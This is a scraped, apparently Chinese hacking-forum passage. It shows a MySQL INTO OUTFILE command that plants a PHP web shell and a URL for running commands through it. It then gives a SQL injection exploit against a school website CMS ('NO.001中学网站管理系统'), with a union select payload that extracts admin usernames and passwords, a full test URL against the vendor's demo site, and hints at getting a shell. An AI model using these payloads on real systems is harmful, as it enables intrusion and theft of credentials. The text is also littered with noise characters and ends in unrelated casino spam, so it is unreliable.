/ ~" L' X+ Q  w+ Hselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
然后访问网站目录：http://www.2cto.com/study.php?cmd=dir
. o6 e4 f% B, \: @2 ^-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

7 D, d# E9 l+ m9 LNO.001中学网站管理系统 Build 110628 注入漏洞
$ c! R. y, N# H8 x" \/ g
NO.001中学网站管理系统功能模块:
1.管理员资料:网站的基本信息设置（校长邮箱等）,数据库备份,用户管理、部门及权限管理等
2.学校简介:一级分类，可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
+ L) S6 Z1 P4 o$ n' d3.文章管理:二级分类,动态添加各相关频道（图片视频频道、学校概况频道除外）文章等信息
4 b5 v2 C0 i2 H' d  C) ^6 @4.视频图片管理:一级分类,动态添加视频或者图片等信息
9 B# m; H. H/ i' g. T& a' A5.留言管理:对留言,修改,删除、回复等管理
" X/ X; O# E: Y( _6.校友频道:包括校友资料excel导出、管理等功能
7.友情链接管理:二级分类，能建立不同种类的友情链接显示在首页
% X# U; `+ @+ Z9 {( E; ]5 ~3 _默认后台:admin/login.asp
  Z# i4 g8 [& n5 n4 q* n. W官方演示:http://demo.001cms.net
源码下载地址:http://down.chinaz.com/soft/30187.htm
EXP:
6 q7 x+ B% K0 zunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
. I8 }* e7 O" i, H7 @( D, Z测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
getshell:后台有备份，你懂的
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多，我在这里就不说了。
3 M& v4 G! V/ P. f$ h! ~$ n, W, l$ M-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

casino slots
online casino canada
new online casino
slot machines